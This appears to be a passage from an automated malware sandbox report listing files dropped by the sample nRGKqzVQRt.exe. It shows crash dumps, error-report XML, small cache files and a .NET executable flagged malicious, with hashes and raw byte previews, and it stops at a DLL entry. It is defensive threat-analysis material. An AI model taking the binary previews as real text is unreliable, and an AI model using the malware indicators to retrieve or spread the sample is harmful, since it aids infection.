                                                SHA1:4E93D2F3B61DB9227B7FA4B1E6C49DE3DC07A35A
                                                SHA-256:DFE6ECBE2A6140BA24D86C85817150E5ADC0C258082D8333346365D1727A5556
                                                SHA-512:F0AD196CA6FA1F388727C7551E497FD2A409F66BED8B4AFF94C4116127313A4747F64CDA55F5DEED8B1983D920DE5F47F43491AFC23EA36B5725579A21A65C93
                                                Malicious:false
                                                Preview:MDMP..a..... .........g........................4................7..........T.......8...........T............&..p.......................................................................................................eJ......D.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E47.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.7025053209083594
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxW636Y2DsSU9cyWjGgmfU4npBa89bubssfpIjm:R6lXJg636YhSU9cGgmfU4bub/fy6
                                                MD5:807C1FA04AB9C570D8518410E3A893D3
                                                SHA1:20597C18749D55897109C556C329D4BC09138D64
                                                SHA-256:DB03E6C69DF4D9DE9913BD90FBC40458CCC39A0B28449B8CB451B9524E26DBAF
                                                SHA-512:032F25C78FD4BCB14C0AA9A9CE03D08E6142B70425B5C266EA3E1B2C14E0D2505227729B187B73CEC513F4D2466304DDCC6B126627681FF6AD0A5113F374BF8B
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E67.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.5001614912616805
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs6uJg77aI9R2WpW8VY5Ym8M4JPGtFJ+q8vZ61wWbxhQd:uIjf6kI7/X7VlJPaKg1ZbxhQd
                                                MD5:7E7203E9BF6194F3C6039F2E7DFB7A60
                                                SHA1:1F1F04A6094B409FF9D30348F6C9AFF778E73C52
                                                SHA-256:62C7789390C8E47615DED63673202C7D3D0559B81AF764B3544EF397BE08B80C
                                                SHA-512:526439A0A85C84EF0B0A08881D843EFF9944F4D301F949684D0430AB9AB08B7924DFA7AC7495A9DD155632BDC86CA7925030674AAC05407291DBD504C0B893B3
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3069.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:08 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):93212
                                                Entropy (8bit):2.1436196769691533
                                                Encrypted:false
                                                SSDEEP:384:Gy2aONvgAbVkEU4hoTSgQ9WiKa6EmWlv2MzbV2DqbGPV3f9ijXtu9jeG:VbO4AbGELhoTTta6w2M3zG5l
                                                MD5:C1BA034D12B7134D5E3FBA5DF361FB2D
                                                SHA1:FC3FBC78CD697908734C28F28331EB2DCC3617F5
                                                SHA-256:4888FF27C7BDC367E6CA81122FDCB66F5AB6EC1D27915D3BFD1716BF8199DC9B
                                                SHA-512:4382B8CF1CFCBC06BBACAF609501978340B05D55965607498F92E097F500D862C3BBD4BB7744C1BDC6636E3E2BFE1CCB75EDBB553CC149D099448CB831BD3C5E
                                                Malicious:false
                                                Preview:MDMP..a..... .........g....................................t....<..........T.......8...........T...........8-...>......................................................................................................eJ......$.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER30F6.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.7029601557150396
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxC66r6Y2D/SU9OhgmfU4npBa89bTssfI0jxm:R6lXJ06G6YSSU9OhgmfU4bT/fI04
                                                MD5:9D1A85EA8BCABA864334DF6EF5897C9C
                                                SHA1:1655A7032F91B465588A7501566772091EC478F5
                                                SHA-256:AADA2E22CE72911FF600AB19216E117A9300206CC4DC42CDB86F918B32811003
                                                SHA-512:5D565D91D9C59D3145EB2CDC7FD3BF275B9E68D3121D03E350603538581E101DB066613DE76B298D625549CBA5FCB46D4FFE82F6AE8B4A31C13EE768A4FB0A14
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3193.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.500110931322714
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs6uJg77aI9R2WpW8VYJYm8M4JPGtFC+q8vZ61wWbxhQd:uIjf6kI7/X7VJJPhKg1ZbxhQd
                                                MD5:570F18C06D0A29473AB67362A49720BC
                                                SHA1:10BA71B2C1D8C7AA527368D02FC9FEFDA70F108A
                                                SHA-256:10EC0946B8F49CECACE5CFF8217BB09652B3F60CEB20292A9A46C5B206221011
                                                SHA-512:241028B60B0C9AC6AD4AD878F79697CC6735D27507C9F4197CDFA4C0BE753971274EE60D6B27B80E1FA1F6AB51BC23621A6CC493ABFF64F7915267606DF1BD19
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERADC6.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:40 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):51206
                                                Entropy (8bit):2.663137083611537
                                                Encrypted:false
                                                SSDEEP:384:oGU81pbCqN1GY8HVAfulv2MzbNO6q73zB31itL3tIY:oXUpbCfVJ2M36jDgq
                                                MD5:68E43416F49D4AE57D43FE578BDF15C0
                                                SHA1:6B35909B6D8793AD8FC1F92BECF82BB5F7687DA8
                                                SHA-256:326A754D8DFFDA443AE7DA596D3797BD80560AEC64D82A5A1140E0EFEE2C90C5
                                                SHA-512:BFCB287F1A20E56BE04E5D6D68A52796E6FA1F6644040950CD91773A6D4A2C8F20235DDC8B69694636D438E5F76CC2D8D906E3C2670EE897CA1213DC1A2332D7
                                                Malicious:false
                                                Preview:MDMP..a..... .........g............4...............<...........Z,..........T.......8...........T............:..........................................................................................................eJ....... ......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERAEE1.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8320
                                                Entropy (8bit):3.6981411656432233
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxj6Ie96Y2DASU9jsBgmf6i0nprp89bfssfX1m:R6lXJl6Ie96YtSU9gBgmf6i08f/fI
                                                MD5:0B89AEC6A49B98574679DD139DFE0A23
                                                SHA1:BD317DD49E00F6425B502DADA637B8BB4C5F10BB
                                                SHA-256:2A632E1E9574AB4106F8F73394DC82D592B172BC800DBD15154283366E9C9D94
                                                SHA-512:A78614EDFD3F6FEAB043EE2937F96341704586B1E054CBBAF354E4EF319A4AF08D9AAD55EEFCC8E877F3548D35FF55EAAF8630F25EB1A28EFB55327D8AF3873F
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF10.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4579
                                                Entropy (8bit):4.483890293805548
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zssJg77aI9R2WpW8VYhYm8M4JPGNF8F+q86J1wWbxhQd:uIjfqI7/X7V1JP5h1ZbxhQd
                                                MD5:5C4860886BB6EE724E9CAA6C873DD095
                                                SHA1:92C6687E58C3657AD0B522C5E4305DC20D2A3888
                                                SHA-256:443E206F42B16AD6F94384C18351F42BD60386718800931334BE5C7B16C17873
                                                SHA-512:FB7F1451F6473045FCB0C49A8EC5688263D46A4B1896B969E1EE57E18F096AA5BCFBCB16DE0056382A432F174BFC7F7DD28141690FB7B1095B757E610999798F
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533847" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9AD.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:43 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):47178
                                                Entropy (8bit):2.686801485354
                                                Encrypted:false
                                                SSDEEP:384:CGU81bbCqMgIcYUBfulv2MzbV2vsC6azIKidMekQ7:CXUbbCH2M3JCVGM27
                                                MD5:51B3493C007B8543D07E68113D0F724A
                                                SHA1:413C7AAFD47A4908620D3B6DFEF5D4DD9B75D0FE
                                                SHA-256:8203BCF636703282E4D6AF7B5550C796AF3F78AA81F97038CB557BA5B4AAF07B
                                                SHA-512:48CA0242EAB2020AD0DBF2C0796432BDACD021AE50FD2AFDCEBB173B480357F0310A33DCD71735A22C53DD5FB1F82560D79347E103C428DA165036E946F801D3
                                                Malicious:false
                                                Preview:MDMP..a..... .........g............4...............<...........Z,..........T.......8...........T............:..z}......................................................................................................eJ....... ......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA2B.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8428
                                                Entropy (8bit):3.703192528400027
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxs6IeA6Y2DuSU9bWMgmfLfnpDa89bkssfbMm:R6lXJK6IeA6YTSU9aMgmfLfhk/fF
                                                MD5:4DF48D0A83DF1DD046D9B10F3F32E5AE
                                                SHA1:295F79A31010133B9BA7087B6675F1116B16C3D2
                                                SHA-256:176E130CA5640853E61BE5035B650A615120A7223FFD50006A4BC39027286B5B
                                                SHA-512:76578B1042DD39FD39FC7237C94969182E800EB3335ACFE42C50CB165E8BBDED39FA1EAA6DAEA94C3F655E8971FBF9869B6C3C292E398876CCCB7A3124090698
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA5B.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4724
                                                Entropy (8bit):4.500692982549049
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zssJg77aI9R2WpW8VYgYm8M4JPG3O3FU+q8vZ3O01wWbxhQd:uIjfqI7/X7VoJPkFKlD1ZbxhQd
                                                MD5:01C2243E4F8B2A4256CC5B859FD59605
                                                SHA1:C87B3754E2AB37E521F0D79E4626A77170485CD8
                                                SHA-256:E9603EDB059A951C44075D1058D2F6736D090CB4D06D323C8FA07162C70EE686
                                                SHA-512:621E3230457F7E11E2029AE3928750E455E73459936EFC3B17124780984E0E533258E3AA9200095BD5E9ACE761F0E4E1A3C5EEA1DACA4595F8DFB52FD1F1777B
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533847" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\key[1].htm

                                                Download File
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):21
                                                Entropy (8bit):3.880179922675737
                                                Encrypted:false
                                                SSDEEP:3:gFsR0GOWW:gyRhI
                                                MD5:408E94319D97609B8E768415873D5A14
                                                SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                Malicious:false
                                                Preview:9tKiK3bsYm4fMuK47Pk3s

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\soft[1]

                                                Download File
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):1502720
                                                Entropy (8bit):7.646111739368707
                                                Encrypted:false
                                                SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 75%
                                                • Antivirus: Virustotal, Detection: 60%, Browse
                                                Joe Sandbox View:
                                                • Filename: BDY5OFXpM9.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: univ.exe, Detection: malicious, Browse
                                                • Filename: univ.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: CSBls4grBI.exe, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exe, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.589.31532.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\download[1].htm

                                                Download File
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:V:V
                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                Malicious:false
                                                Preview:0

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\name[1].htm

                                                Download File
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):7
                                                Entropy (8bit):2.2359263506290326
                                                Encrypted:false
                                                SSDEEP:3:xIAn:z
                                                MD5:8FA007FA30513F97141DA3E39B658159
                                                SHA1:AA260A3AF3BB77E2A07056AFE79F3E2B88DB7257
                                                SHA-256:3279465B2D2603BE30735D69F5439CF95136E4725A85DC0B2EA09DB0E57B092F
                                                SHA-512:B2AF43AF1D4AC0DF6AE71895C9BFFC5E5FDC114F385C38F76CCF79EA8796A0CDFC6B5DAA92EE1CA347A7282A7B0FC6E89863E9CF30891FBF151B88FB1E668E1F
                                                Malicious:false
                                                Preview:mixnine

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\add[1].htm

                                                Download File
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:V:V
                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                Malicious:false
                                                Preview:0

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dll[1]

                                                Download File
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):242176
